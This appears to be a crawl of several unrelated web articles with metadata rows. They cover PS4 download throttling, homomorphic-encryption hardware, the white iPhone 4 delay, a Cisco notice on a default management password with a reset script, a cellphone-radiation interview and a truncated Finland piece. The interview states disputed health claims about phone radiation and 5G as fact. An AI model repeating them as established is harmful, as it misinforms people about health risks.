It got a decent receive window of over 400kB; the conclusion is that the artificial receive window limit appears to only apply to PSN downloads. - Putting the PS4 into rest mode had no effect. - Built-in features of the PS4 UI, like the web browser, do not count as apps. - When a game was started (causing the previously running game to be stopped automatically), the receive window could increase to 650kB for a very brief period of time. Basically it appears that the receive window gets unclamped when the old game stops, and then clamped again a few seconds later when the new game actually starts up. I did a few more test runs, and all of them seemed to support the above findings. The only additional information from that testing is that the rest mode behavior was dependent on the PS4 settings. Originally I had it set up to suspend apps when in rest mode. If that setting was disabled, the apps would be closed when entering in rest mode, and the downloads would proceed at full speed. A 7kB receive window will be absolutely crippling for any user. A 128kB window might be ok for users who have CDN servers very close by, or who don't have a particularly fast internet. For example at my location, a 128kB receive window would cap the downloads at about 35Mbp to 75Mbps depending on which CDN the DNS RNG happens to give me. The lowest two speed tiers for my ISP are 50Mbps and 200Mbps. So either the 128kB would not be a noticeable problem (50Mbps) or it'd mean that downloads are artificially limited to to 25% speed (200Mbps). ### Conclusions If any applications are running, the PS4 appears to change the settings for PSN store downloads, artificially restricting their speed. Closing the other applications will remove the limit. There are a few important details: - Just leaving the other applications running in the background will **not help**. The exact same limit is applied whether the download progress bar is in the foreground or not. - Putting the PS4 into rest mode might or might not help, depending on your system settings. - The artificial limit applies only to the PSN store downloads. It does **not**affect e.g. the built-in speedtest. This is why the speedtest might report much higher speeds than the actual downloads, even though both are delivered from the same CDN servers. - Not all applications are equal; most of them will cause the connections to slow down by up to a factor of 5. Some games will cause a difference of about a factor of 100. Some games will start off with the factor of 5, and then migrate to the factor of 100 once you leave the start menu and start playing. - The above limits are artificial. In addition to that, actively playing a game can cause game downloads to slow down. This appears to be due to a genuine lack of CPU resources (with the game understandably having top priority). So if you're seeing slow downloads, just closing all the running applications might be worth a shot. (But it's obviously not guaranteed to help. There are other causes for slow downloads as well, this will just remove one potential bottleneck). To close the running applications, you'll need to long-press the PS button on the controller, and then select "Close applications" from the menu. The PS4 doesn't make it very obvious exactly what programs are running. For games, the interaction model is that opening a new game closes the previously running one. This is not how other apps work; they remain in the background indefinitely until you explicitly close them. And it's gets worse than that. If your PS4 is configured to suspend any running apps when put to rest mode, you can seemingly power on the machine into a clean state, and still have a hidden background app that's causing the OS to limit your PSN download speeds. This might explain some of the superstitions about this on the Internet. There are people who swear that putting the machine to rest mode helps with speeds, others who say it does nothing. Or how after every firmware update people will report increased download speeds. Odds are that nothing actually changed in the firmware; it's just that those people had done their first full reboot in a while, and finally had a system without a background app running. ### Speculation Those were the facts as I see them. Unfortunately this raises some new questions, which can't be answered experimentally. With no facts, there's no option except to speculate wildly! **Q: Is this an intentional feature? If so, what its purpose?** Yes, it must be intentional. The receive window changes very rapidly when applications or games are opened/closed, but not for any other reason. It's not any kind of subtle operating system level behavior; it's most likely the PS4 UI explicitly manipulating the socket receive buffers. But why? I think the idea here must be to not allow the network traffic of background downloads to take resources away from the foreground use of the PS4. For example if I'm playing an online shooter, it makes sense to harshly limit the background download speeds to make sure the game is getting ping times that are both low and predictable. So there's at least some point in that 7kB receive window limit in some circumstances. It's harder to see what the point of the 128kB receive window limit for running any app is. A single game download from some random CDN isn't going to muscle out Netflix or Youtube... The only thing I can think of is that they're afraid that multiple simultaneous downloads, e.g. due to automatic updates, might cause problems for playing video. But even that seems like a stretch. There's an alternate theory that this is due to some non-network resource constraints (e.g. CPU, memory, disk). I don't think that works. If the CPU or disk were the constraint, just having the appropriate priorities in place would automatically take care of this. If the download process gets starved of CPU or disk bandwidth due to a low priority, the receive buffer would fill up and the receive window would scale down dynamically, exactly when needed. And the amounts of RAM we're talking about here are miniscule on a machine with 8GB of RAM; less than a megabyte. **Q: Is this feature implemented well?** Oh dear God, no. It's hard to believe just how sloppy this implementation is. The biggest problem is that the limits get applied based just on what games/applications are currently running. That's just insane; what matters should be which games/applications someone is currently using. Especially in a console UI, it's a totally reasonable expectation that the foreground application gets priority. If I've got the download progress bar in the foreground, the system had damn well give that download priority. Not some application that was started a month ago, and hasn't been used since. Applying these limits in rest mode with suspended apps is beyond insane. Second, these limits get applied per-connection. So if you've got a single download going, it'll get limited to 128kB of receive window. If you've got five downloads, they'll all get 128kB, for a total of 640kB. That means the efficiency of the "make sure downloads don't clog the network" policy depends purely on how many downloads are active. That's rubbish. This is all controlled on the application level, and the application knows how many downloads are active. If there really were an optimal static receive window X, it should just be split evenly across all the downloads. Third, the core idea of applying a static receive window as a means of fighting bufferbloat is just fundamentally broken. Using the receive window as the rate limiting mechanism just means that the actual transfer rate will depend on the RTT (this is why a local proxy helps). For this kind of thing to work well, you can't have the rate limit depend on the RTT. You also can't just have somebody come up with a number once, and apply that limit to everyone. The limit needs to depend on the actual network conditions. There are ways to detect how congested the downlink is in the client-side TCP stack. The proper fix would be to implement them, and adjust the receive window of low-priority background downloads if and only if congestion becomes an issue. That would actually be a pretty valuable feature for this kind of appliance. But I can kind of forgive this one; it's not an off the shelf feature, and maybe Sony doesn't employ any TCP kernel hackers. Fourth, whatever method is being used to decide on whether a game is network-latency sensitive is broken. It's absurd that a demo of a single-player game idling in the initial title screen would cause the download speeds to be totally crippled. This really should be limited to actual multiplayer titles, and ideally just to periods where someone is actually playing the game online. Just having the game running should not be enough. **Q: How can this still be a problem, 4 years after launch?** I have no idea. Sony must know that the PSN download speeds have been a butt of jokes for years. It's probably the biggest complaint people have with the system. So it's hard to believe that nobody was ever given the task of figuring out why it's slow. And this is not rocket science; anyone bothering to look into it would find these problems in a day. But it seems equally impossible that they know of the cause, but decided not to apply any of the the trivial fixes to it. (Hell, it wouldn't even need to be a proper technical fix. It could just be a piece of text saying that downloads will work faster with all other apps closed). So while it's possible to speculate in an informed manner about other things, this particular question will remain as an open mystery. Big companies don't always get things done very efficiently, eh? ### Footnotes [1] How idle? So idle that I hadn't even logged in, the app was in the login screen. [2] To be specific, the slowdown is caused by the artifical latency changes. The PS4 downloads files in chunks, and each chunk can be served from a different CDN. The CDN that was being used from 10:51 to 11:00 was using a delay-based congestion control algorithm, and reacting to the extra latency by reducing the amount of data sent. The CDN used earlier in the connection was using a packet-loss based congestion control algorithm, and did not slow down despite seeing the latency change in exactly the same pattern. Thank you for investigating this issue. I was wondering about this for years now.
true
true
true
PS4 downloads have a reputation of being very slow. I did some digging to find out the root cause, and was surprised.
2024-10-12 00:00:00
2017-08-19 00:00:00
https://www.snellman.net…2-rwin-thumb.png
null
snellman.net
snellman.net
null
null
38,142,727
https://spectrum.ieee.org/fully-homomorphic-encryption
The Future of Fully Homomorphic Encryption
NYU Tandon School
*This sponsored article is brought to you by NYU Tandon School of Engineering.* In our digital age, where information flows seamlessly through the vast network of the internet, the importance of encrypted data cannot be overstated. As we share, communicate, and store an increasing amount of sensitive information online, the need to safeguard it from prying eyes and malicious actors becomes paramount. Encryption serves as the digital guardian, placing our data in a lockbox of algorithms that only those with the proper key can unlock. Whether it’s personal messages, health data, financial transactions, or confidential business communications, encryption plays a pivotal role in maintaining privacy and ensuring the integrity of our digital interactions. Typically, data encryption protects data in transit: it’s locked in an encrypted “container” for transit over potentially unsecured networks, then unlocked at the other end, by the other party for analysis. But outsourcing to a third-party is inherently insecure. Brandon Reagen, Assistant Professor of Computer Science and Engineering and Electrical and Computer Engineering at the NYU Tandon School of Engineering. NYU Tandon School of Engineering But what if encryption didn’t just exist in transit and sit unprotected on either end of the transmission? What if it was possible to do all of your computer work — from basic apps to complicated algorithms — fully encrypted, from beginning to end. That is the task being taken up by Brandon Reagen, Assistant Professor of Computer Science and Engineering and Electrical and Computer Engineering at the NYU Tandon School of Engineering. Reagen, who is also a member of the NYU Center for Cybersecurity, focuses his research on designing specialized hardware accelerators for applications including privacy preserving computation. And now, he is proving that the future of computing can be privacy-forward while making huge advances in information processing and hardware design. ## All-encompassing Encryption In a world where cyber threats are ever-evolving and data breaches are a constant concern, encrypted data acts as a shield against unauthorized access, identity theft, and other cybercrimes. It provides individuals, businesses, and organizations with a secure foundation upon which they can build trust and confidence in the digital realm. The goal of cybersecurity researchers is the protection of your data from all sorts of bad actors — cybercriminals, data-hungry companies, and authoritarian governments. And Reagen believes encrypted computing could hold an answer. “This sort of encryption can give you three major things: improved security, complete confidentiality and sometimes control over how your data is used,” says Reagen. “It’s a totally new level of privacy.” “My aim is to develop ways to run expensive applications, for example, massive neural networks, cost-effectively and efficiently, anywhere, from massive servers to smartphones” **—Brandon Reagen, NYU Tandon** Fully homomorphic encryption (FHE), one type of privacy preserving computation, offers a solution to this challenge. FHE enables computation on encrypted data, or ciphertext, to keep data protected at all times. The benefits of FHE are significant, from enabling the use of untrusted networks to enhancing data privacy. FHE is an advanced cryptographic technique, widely considered the “holy grail of encryption,” that enables users to process encrypted data while the data or models remain encrypted, preserving data privacy throughout the data computation process, not just during transit. While a number of FHE solutions have been developed, running FHE in software on standard processing hardware remains untenable for practical data security applications due to the massive processing overhead. Reagen and his colleagues have recently been working on a DARPA-funded project called The Data Protection in Virtual Environments (DPRIVE) program, that seeks to speed up FHE computation to more usable levels. The microarchitecture of Reagen’s designed Ring Processing Unit (RPU), one of several designs to remake cybersecurity in computing. The RPU was designed for general ring processing with high performance by taking advantage of regularity and data parallelism. NYU Tandon School of Engineering Specifically, the program seeks to develop novel approaches to data movement and management, parallel processing, custom functional units, compiler technology, and formal verification methods that ensure the design of the FHE implementation is effective and accurate, while also dramatically decreasing the performance penalty incurred by FHE computations. The target accelerator should reduce the computational run time overhead by many orders of magnitude compared to current software-based FHE computations on conventional CPUs, and accelerate FHE calculations to within one order of magnitude of current performance on unencrypted data. ## The Hardware Promising Privacy While FHE has been shown to be possible, the hardware required for it to be practical is still rapidly being developed by researchers. Reagen and his team are designing it from the ground up, including new chips, datapaths, memory hierarchies, and software stacks to make it all work together. The team was the first to show that the extreme levels of speedup needed to make HE feasible was possible. And by early next year, they’ll begin manufacturing of their prototypes to further their field testing. Reagen — who earned a doctoral degree in computer science from Harvard in 2018 and undergraduate degrees in computer systems engineering and applied mathematics from the University of Massachusetts, Amherst, in 2012 — focused on creating specialized hardware accelerators for applications like deep learning. These accelerators enhance specialized hardware that can be made orders of magnitude more efficient than general-purpose platforms like CPUs. Enabling accelerators requires changes to the entire compute stack, and to bring about this change, he has made several contributions to lowering the barrier of using accelerators as general architectural constructs, including benchmarking, simulation infrastructure, and System on a Chip (SoC) design. Cheetah accelerator architecture, an earlier project from Reagen. (a) The accelerator is composed of parallel PEs operating in output stationary fashion. Off-chip data is communicated via a PCIe-like streaming interface, and data is buffered on-chip using global PE SRAM. (b) Each PE contains Partial Processing Lanes which compute the HE dot product. (c) Lanes comprise individual HE operators. NYU Tandon School of Engineering “My aim is to develop ways to run expensive applications, for example, massive neural networks, cost-effectively and efficiently, anywhere, from massive servers to smartphones,” he says. Before coming to NYU Tandon, Reagen was a former research scientist on Facebook’s AI Infrastructure Research team, where he became deeply involved in studying privacy. This combination of a deep cutting-edge computer hardware background and a commitment to digital security made him a perfect fit for NYU Tandon and the NYU Center for Cybersecurity, which has been at the forefront of cybersecurity research since its inception. “A lot of the big problems that we have in the world right now revolve around data. Consider global health coming off of COVID: if we had better ways of computing global health data analytics and sharing information without exposing private data, we might have been able to respond to the crisis more effectively and sooner” **—Brandon Reagen, NYU Tandon** For Reagen, this is an exciting moment in the history of privacy preserving computation, a field that will have huge implications for the future of data and computing. “I’m an optimist — I think this could have as big an impact as the Internet itself,” says Reagen. “And the reason is that, if you think about a lot of the big problems that we have in the world right now, a lot of them revolve around data. Consider global health. We’re just coming off of COVID, and if we had better ways of computing global health data analytics and sharing information without exposing private data, we might have been able to respond to the crisis more effectively and sooner. If we had better ways of sharing data about climate change data from all over the world, without exposing what each individual country or state or city was actually emitting, you could imagine better ways of managing and fighting global climate change. These problems are, in large part, problems of data, and this kind of software can help us solve them.” The NYU Tandon School of Engineering is the engineering and applied sciences school of New York University.
true
true
true
NYU Tandon researchers are developing specialized hardware accelerators for enabling computation on encrypted data
2024-10-12 00:00:00
2023-11-01 00:00:00
https://spectrum.ieee.or…ge.png?width=210
article
ieee.org
IEEE Spectrum
null
null
1,541,108
http://www.edibleapple.com/white-iphone-4-delayed-until-later-this-year/
Edible Apple
null
Apple issued a statement today explaining that the white model iPhone 4 will not start shipping until later this year. White models of Apple’s new iPhone 4 have continued to be more challenging to manufacture than we originally expected, and as a result they will not be available until later this year. The availability of the more popular iPhone 4 black models is not affected. Reports earlier this week indicated that the holdup is due to Apple’s demand for perfection in getting the exact shade of white they’re looking for. A Gizmodo reader noted back in late June: Actually the white on the iPhone is not painted, it is screen printed. I cannot say who I am as Apple does have a non-disclosure in effect for this, but: The color specifications for the white on the new iPhones are just crazy. The tolerances they are trying to achieve with the white really is the cause of the delay. As screen printing goes, it is somewhat controllable, doesn’t have the tolerance that Apple is wanting to hold the color specification of the white too. Talk about anal… It was originally assumed the white iPhone 4 would be released along with the black iPhone 4, but it soon became apparent that that wouldn’t be the case when the white iPhone 4 wasn’t initially available for pre-order. A few weeks later, on June 23, Apple issued a press release stating that white iPhone models wouldn’t be available until the latter part of July. And now with July slowly making way for August, customers interested in a white iPhone 4 will have to wait until sometime this Fall.. maybe. Fri, Jul 23, 2010 News
true
true
true
null
2024-10-12 00:00:00
2010-07-23 00:00:00
null
null
edibleapple.com
edibleapple.com
null
null
10,930,418
http://www.cisco.com/c/en/us/support/docs/field-notices/640/fn64093.html
Field Notice: FN - 64093 - UCSC Series Default Password for Units Shipped November 17, 2015 through January 6, 2016 is Incorrect - Configuration Change Recommended
null
**THIS FIELD NOTICE IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTY OF MERCHANTABILITY. YOUR USE OF THE INFORMATION ON THE FIELD NOTICE OR MATERIALS LINKED FROM THE FIELD NOTICE IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS FIELD NOTICE AT ANY TIME.** Revision | Publish Date | Comments | ---|---|---| 1.0 | 11-Jan-16 | Initial Release | 10.0 | 28-Nov-17 | Migration to new field notice system | 10.1 | 13-Dec-17 | fixing migration of PIDs and MDF tags | 10.2 | 23-May-18 | Fixed Broken Image Links | 10.3 | 07-Dec-18 | Updated the Image Link | Affected Product ID | Comments | ---|---| UCSC-BASE-M2-C460= | Part Alternate | UCSC-BASE-M2-C460 | | UCSC-C220-M3S | | UCSC-C220-M3S= | Part Alternate | UCSC-C220-M3L= | Part Alternate | UCSC-C240-M3L | | UCSC-C240-M3S | | UCSC-C240-M3S= | Part Alternate | UCSC-C240-M3L= | Part Alternate | UCSC-C22-M3S | | UCSC-C22-M3S= | Part Alternate | UCSC-C24-M3S | | UCSC-C24-M3S= | Part Alternate | UCSC-C22-M3L | | UCSC-C22-M3L= | Part Alternate | UCSC-C420-M3 | | UCSC-C240-M3S2 | | UCSC-C240-M3S2= | Part Alternate | MXE-3500-V3-K9 | | SNS-3415-K9 | | SNS-3495-K9 | | UCSC-C220-M3SBE | | UCSC-C420-M3= | Part Alternate | MDE-1125-K9 | | MDE-3125-K9= | Part Alternate | MDE-1125-K9= | Part Alternate | MDE-3125-K9 | | N1K-1110-S | | N1K-1110-X | | CSM4-UCS2-50-K9 | | NGA3240-K9 | | N1K-1110-S= | Part Alternate | N1K-1110-X= | Part Alternate | MXE-3500-V3-K9= | Part Alternate | TCS-C220-5RP-K9 | | TCS-SMB-C220-K9 | | TCS-C220-5RP-K9= | Part Alternate | CPS-UCS-2RU-K9= | Part Alternate | CPS-UCS-2RU-K9 | | CPS-UCS-1RU-K9= | Part Alternate | CPS-UCS-1RU-K9 | | UCSC-C460-M4= | Part Alternate | UCSC-C460-M4 | | CTI-CE1K-BDL-K9 | | EXPWY-CE1K-BDL-K9 | | CAAPL-CSPC-L-V1-K9 | | EXPWY-CE1K-BDL-K9= | Part Alternate | CTI-CE1K-BDL-K9= | Part Alternate | UCSC-C220-M4L | | UCSC-C220-M4S | | UCSC-C220-M4L= | Part Alternate | UCSC-C220-M4S= | Part Alternate | UCSC-C240-M4L | | UCSC-C240-M4S2 | | UCSC-C240-M4SX | | UCSC-C240-M4S | | UCSC-C240-M4SX= | Part Alternate | UCSC-C240-M4S= | Part Alternate | UCSC-C240-M4S2= | Part Alternate | UCSC-C240-M4L= | Part Alternate | APIC-SERVER-L1 | | APIC-SERVER-M1 | | APIC-SERVER-L1= | Part Alternate | APIC-SERVER-M1= | Part Alternate | TG5000-K9 | | TG5500-K9 | | UCSC-C240-M4SNEBS= | Part Alternate | UCSC-C240-M4SNEBS | Defect ID | Headline | ---|---| CSCux71901 | [DOC] Rack Server Documentation on Default CIMC Password Cisco1234 | A number of C-Series servers have shipped to customers with a non-standard default password which prevents access to the Cisco Integrated Management Controller (CIMC) unless the configured password is provided. Systems manufactured between November 17, 2015 and January 6, 2016 were produced with a different default password. Customers might not be able to log in to their C-Series servers with the published default admin password "password" since this has been changed to "Cisco1234" for these systems. Customers should access the CIMC interface with this combination "admin":"Cisco1234" and set the password back to the default or a customer desired password. **Workaround #1(Recommended)** Log in to the system with this alternate password "Cisco1234" and change it to a known password. **Workaround #2** Connect crash cart to the system. Power the system on and use the F8 menu in order to reset the CIMC to factory defaults or change the admin password: **Workaround #3** **Note**: This workaround assumes that the CIMC is online and the IP address is known. This solution is for customers who used DHCP to IP the CIMC(s). Use XML API in order to log in to one or more system and change the password. A sample script is provided: Import-ModuleCiscoImcPs $multiimc =Set-ImcPowerToolConfiguration-SupportMultipleDefaultImc$true # The tool prompts the user to enter IP addresses when run. $imclist =Read-Host"Enter Cisco IMC IP or list of IMC IPs separated by commas" [array]$imclist = ($imclist.split(",")).trim() $user = 'admin' # The non-standard password is on the next line (update as needed). $pass =ConvertTo-SecureString-String "Cisco1234"-AsPlainText -Force$cred =New-Object-TypeNameSystem.Management.Automation.PSCredential-ArgumentList$user, $pass $out =Connect-Imc-Credential$cred $imclist # The password on the next line is the new password for this user. $newpass = "password"Get-ImcLocalUser-Id1 |Set-ImcLocalUser-Pwd$newpass-Force|Out-GridView$out =Disconnect-Imc If you require further assistance, or if you have any further questions regarding this field notice, please contact the Cisco Systems Technical Assistance Center (TAC) by one of the following methods: Cisco Notification Service—Set up a profile to receive email updates about reliability, safety, network security, and end-of-sale issues for the Cisco products you specify.
true
true
true
A number of C-Series servers have shipped to customers with a non-standard default password which prevents access to the Cisco Integrated Management Controller (CIMC) unless the configured password is provided.
2024-10-12 00:00:00
2018-12-07 00:00:00
null
website
cisco.com
Cisco
null
null
19,075,021
https://www.jaybosamiya.com/x/questions.txt
null
null
null
true
false
false
null
null
null
null
null
null
null
null
null
27,773,814
https://publichealth.berkeley.edu/news-media/research-highlights/moskowitz-cellphone-radiation-is-harmful-but-few-want-to-believe-it/
Moskowitz: Cellphone radiation is harmful, but few want to believe it - Berkeley News
Anne Brice
# Moskowitz: Cellphone radiation is harmful, but few want to believe it *The telecommunications industry insists cellphone technology is safe. But the director of UC Berkeley’s Center for Family and Community Health is determined to prove it wrong.* July 1, 2021 *For more than a decade, Joel Moskowitz, a researcher in the School of Public Health at UC Berkeley and director of Berkeley’s Center for Family and Community Health, has been on a quest to prove that radiation from cellphones is unsafe. But, he said, most people don’t want to hear it.* *“People are addicted to their smartphones,” said Moskowitz. “We use them for everything now, and, in many ways, we need them to function in our daily lives. I think the idea that they’re potentially harming our health is too much for some people.”* *Since cellphones first came onto the market in 1983, they have gone from clunky devices with bad reception to today’s sleek, multifunction smartphones. And although cellphones are now used by nearly all American adults, considerable research suggests that long-term use poses health risks from the radiation they emit, said Moskowitz.* *“Cellphones, cell towers and other wireless devices are regulated by most governments,” said Moskowitz. “Our government, however, stopped funding research on the health effects of radiofrequency radiation in the 1990s.”* *Since then, he said, research has shown significant adverse biologic and health effects — including brain cancer — associated with the use of cellphones and other wireless devices. And now, he said, with the fifth generation of cellular technology, known as 5G, there is an even bigger reason for concern.* Berkeley News* spoke with Moskowitz about the health risks of cellphone radiation, why the topic is so controversial and what we can expect with the rollout of 5G.* *Berkeley News:* I think we should address upfront is how controversial this research is. Some scientists have said that these findings are without basis and that there isn’t enough evidence that cellphone radiation is harmful to our health. How do you respond to that? **Joel Moskowitz:** Well, first of all, few scientists in this country can speak knowledgeably about the health effects of wireless technology. So, I’m not surprised that people are skeptical, but that doesn’t mean the findings aren’t valid. A big reason there isn’t more research about the health risks of radiofrequency radiation exposure is because the U.S. government stopped funding this research in the 1990s, with the exception of a $30 million rodent study published in 2018 by the National Institute of Environmental Health Sciences’ National Toxicology Program, which found “clear evidence” of carcinogenicity from cellphone radiation. In 1996, the Federal Communications Commission, or FCC, adopted exposure guidelines that limited the intensity of exposure to radiofrequency radiation. These guidelines were designed to prevent significant heating of tissue from short-term exposure to radiofrequency radiation, not to protect us from the effects of long-term exposure to low levels of modulated, or pulsed, radiofrequency radiation, which is produced by cellphones, cordless phones and other wireless devices, including Wi-Fi. Yet, the preponderance of research published since 1990 finds adverse biologic and health effects from long-term exposure to radiofrequency radiation, including DNA damage. More than 250 scientists, who have published over 2,000 papers and letters in professional journals on the biologic and health effects of non-ionizing electromagnetic fields produced by wireless devices, including cellphones, have signed the International EMF Scientist Appeal, which calls for health warnings and stronger exposure limits. So, there are many scientists who agree that this radiation is harmful to our health. ### I first heard you speak about the health risks of cellphone radiation at Berkeley in 2019, but you’ve been doing this research since 2009. What led you to pursue this research? I got into this field by accident, actually. During the past 40 years, the bulk of my research has been focused on tobacco-related disease prevention. I first became interested in cellphone radiation in 2008, when Dr. Seung-Kwon Myung, a physician scientist with the National Cancer Center of South Korea, came to spend a year at the Center for Family and Community Health. He was involved in our smoking cessation projects, and we worked with him and his colleagues on two reviews of the literature, one of which addressed the tumor risk from cellphone use. At that time, I was skeptical that cellphone radiation could be harmful. However, since I was dubious that cellphone radiation could cause cancer, I immersed myself in the literature regarding the biological effects of low-intensity microwave radiation, emitted by cellphones and other wireless devices. After reading many animal toxicology studies that found that this radiation could increase oxidative stress — free radicals, stress proteins and DNA damage — I became increasingly convinced that what we were observing in our review of human studies was indeed a real risk. ### While Myung and his colleagues were visiting the Center for Family and Community Health, you reviewed case-control studies examining the association between mobile phone use and tumor risk. What did you find? Our 2009 review, published in the *Journal of Clinical Oncology*, found that heavy cellphone use was associated with increased brain cancer incidence, especially in studies that used higher quality methods and studies that had no telecommunications industry funding. Last year, we updated our review, published in the *International Journal of Environmental Research and Public Health*, based on a meta-analysis of 46 case-control studies — twice as many studies as we used for our 2009 review — and obtained similar findings. Our main takeaway from the current review is that approximately 1,000 hours of lifetime cellphone use, or about 17 minutes per day over a 10-year period, is associated with a statistically significant 60% increase in brain cancer. ### Why did the government stop funding this kind of research? The telecommunications industry has almost complete control of the FCC, according to *Captured Agency*, a monograph written by journalist Norm Alster during his 2014-15 fellowship at Harvard University’s Center for Ethics. There’s a revolving door between the membership of the FCC and high-level people within the telecom industry that’s been going on for a couple of decades now. The industry spends about $100 million a year lobbying Congress. The CTIA, which is the major telecom lobbying group, spends $12.5 million per year on 70 lobbyists. According to one of their spokespersons, lobbyists meet roughly 500 times a year with the FCC to lobby on various issues. The industry as a whole spends $132 million a year on lobbying and provides $18 million in political contributions to members of Congress and others at the federal level. ### The telecom industry’s influence over the FCC, as you describe, reminds me of the tobacco industry and the advertising power it had in downplaying the risks of smoking cigarettes. Yes, there are strong parallels between what the telecom industry has done and what the tobacco industry has done, in terms of marketing and controlling messaging to the public. In the 1940s, tobacco companies hired doctors and dentists to endorse their products to reduce public health concerns about smoking risks. The CTIA currently uses a nuclear physicist from academia to assure policymakers that microwave radiation is safe. The telecom industry not only uses the tobacco industry playbook, it is more economically and politically powerful than Big Tobacco ever was. This year, the telecom industry will spend over $18 billion advertising cellular technology worldwide. ### You mentioned that cellphones and other wireless devices use modulated, or pulsed, radiofrequency radiation. Can you explain how cellphones and other wireless devices work, and how the radiation they emit is different from radiation from other household appliances, like a microwave? Basically, when you make a call, you’ve got a radio and a transmitter. It transmits a signal to the nearest cell tower. Each cell tower has a geographic cell, so to speak, in which it can communicate with cellphones within that geographic region or cell. Then, that cell tower communicates with a switching station, which then searches for whom you’re trying to call, and it connects through a copper cable or fiber optics or, in many cases, a wireless connection through microwave radiation with the wireless access point. Then, that access point either communicates directly through copper wires through a landline or, if you’re calling another cellphone, it will send a signal to a cell tower within the cell of the receiver and so forth. The difference is the kind of microwave radiation each device emits. With regard to cellphones and Wi-Fi and Bluetooth, there is an information-gathering component. The waves are modulated and pulsed in a very different manner than your microwave oven. ### What, specifically, are some of the health effects associated with long-term exposure to low-level modulated radiofrequency radiation emitted from wireless devices? Many biologists and electromagnetic field scientists believe the modulation of wireless devices makes the energy more biologically active, which interferes with our cellular mechanisms, opening up calcium channels, for example, and allowing calcium to flow into the cell and into the mitochondria within the cell, interfering with our natural cellular processes and leading to the creation of stress proteins and free radicals and, possibly, DNA damage. And, in other cases, it may lead to cell death. In 2001, based upon the biologic and human epidemiologic research, low-frequency fields were classified as “possibly carcinogenic” by the International Agency for Research on Cancer (IARC) of the World Health Organization. In 2011, the IARC classified radiofrequency radiation as “possibly carcinogenic to humans,” based upon studies of cellphone radiation and brain tumor risk in humans. Currently, we have considerably more evidence that would warrant a stronger classification. Most recently, on March 1, 2021, a report was released by the former director of the National Center for Environmental Health at the Centers for Disease Control and Prevention, which concluded that there is a “high probability” that radiofrequency radiation emitted by cellphones causes gliomas and acoustic neuromas, two types of brain tumors. ### Let’s talk about the fifth generation of cellphone technology, known as 5G, which is already available in limited areas across the U.S. What does this mean for cellphone users and what changes will come with it? For the first time, in addition to microwaves, this technology will employ millimeter waves, which are much higher frequency than the microwaves used by 3G and 4G. Millimeter waves can’t travel very far, and they’re blocked by fog or rain, trees and building materials, so the industry estimates that it’ll need 800,000 new cell antenna sites. Each of these sites may have cell antennas from various cellphone providers, and each of these antennas may have microarrays consisting of dozens or even perhaps hundreds of little antennas. In the next few years in the U.S., we will see deployed roughly 2.5 times more antenna sites than in current use unless wireless safety advocates and their representatives in Congress or the judicial system put a halt to this. ### How are millimeter waves different from microwaves, in terms of how they affect our bodies and the environment? Millimeter wave radiation is largely absorbed in the skin, the sweat glands, the peripheral nerves, the eyes and the testes, based upon the body of research that’s been done on millimeter waves. In addition, this radiation may cause hypersensitivity and biochemical alterations in the immune and circulatory systems — the heart, the liver, kidneys and brain. Millimeter waves can also harm insects and promote the growth of drug-resistant pathogens, so it’s likely to have some widespread environmental effects for the microenvironments around these cell antenna sites. ### What are some simple things that each of us can do to reduce the risk of harm from radiation from cellphones and other wireless devices? First, minimize your use of cellphones or cordless phones — use a landline whenever possible. If you do use a cellphone, turn off the Wi-Fi and Bluetooth if you’re not using them. However, when near a Wi-Fi router, you would be better off using your cellphone on Wi-Fi and turning off the cellular because this will likely result in less radiation exposure than using the cellular network. Second, distance is your friend. Keeping your cellphone 10 inches away from your body, as compared to one-tenth of an inch, results in a 10,000-fold reduction in exposure. So, keep your phone away from your head and body. Store your phone in a purse or backpack. If you have to put it in your pocket, put it on airplane mode. Text, use wired headphones or speakerphone for calls. Don’t sleep with it next to your head — turn it off or put it in another room. Third, use your phone only when the signal is strong. Cellphones are programmed to increase radiation when the signal is poor, that is when one or two bars are displayed on your phone. For example, don’t use your phone in an elevator or in a car, as metal structures interfere with the signal. Also, I encourage people to learn more about the 150-plus local groups affiliated with Americans for Responsible Technology, which are working to educate policymakers, urging them to adopt cell tower regulations and exposure limits that fully protect us and the environment from the harm caused by wireless radiation. *For safety tips on how to reduce exposure to wireless radiation from the California Department of Public Health and other organizations, Moskowitz recommends readers visit his website, saferemr.com, Physicians for Safe Technology and the Environmental Health Trust.*
true
true
true
The telecommunications industry insists cellphone technology is safe. But the director of UC Berkeley’s Center for Family and Community Health is determined to prove it wrong.
2024-10-12 00:00:00
2021-07-01 00:00:00
https://news.berkeley.ed…ll-phone-750.jpg
article
berkeley.edu
Berkeley News
null
null
6,042,195
http://www.theatlantic.com/international/archive/2013/07/the-secret-to-finlands-success-with-schools-moms-kids-and-everything/277699/
The Secret to Finland's Success With Schools, Moms, Kids—and Everything
Olga Khazan
# The Secret to Finland's Success With Schools, Moms, Kids—and Everything The country has cheaper medical care, smarter children, happier moms, better working conditions, less-anxious unemployed people, and lower student loan rates than we do. And that probably will never change. It's hard not to get jealous when I talk to my extended family. My cousin's husband gets 36 vacation days per year, not including holidays. If he wants, he can leave his job for a brief hiatus and come back to a guaranteed position months later. Tuition at his daughter's university is free, though she took out a small loan for living expenses. Its interest rate is 1 percent. My cousin is a recent immigrant, and while she was learning the language and training for jobs, the state gave her 700 euros a month to live on. They had another kid six years ago, and though they both work, they'll collect 100 euros a month from the government until the day she turns 17. They of course live in Finland, home to saunas, quirky metal bands, and people who have for decades opted for equality and security over keeping more of their paychecks. Inarguably one of the world's most generous -- and successful -- welfare states, the country has a lower infant mortality rate, better school scores, and a far lower poverty rate than the United States, and it's the second-happiest country on earth (the U.S. doesn't break the top 10). According to the OECD, Finns on average give an 8.8 score to their overall life satisfaction. Americans are at 7.5. Sometimes when I'm watching the web traffic for stories here at *The* *Atlantic*'s global desk, I'll notice a surge in readership in one of a couple of archival stories we have about how fantastic Finland is -- usually thanks to Reddit or a link from another news site. One is about Finland's "baby boxes, " a sort of baby shower the Finnish government throws every mom. A package sent to expecting women contains all the essentials for newborns -- everything from diapers to a tiny sleeping bag. (Want to choose your own baby clothes? You can opt instead for the box's cash value, as my cousin did.) The other popular story is about Finland's school system, which ranks as one of the world's best -- with no standardized testing or South Asian-style "cramming" but with lots of customization in the classroom. Oh, and students there also spend fewer hours physically in school than their counterparts in other Western countries. As the U.S. raises student loan rates, considers cutting food stamps, guts long-term unemployment insurance, and strains to set up its first-ever universal healthcare system, it's easy to get sucked into articles about a country that has lapped America in certain international 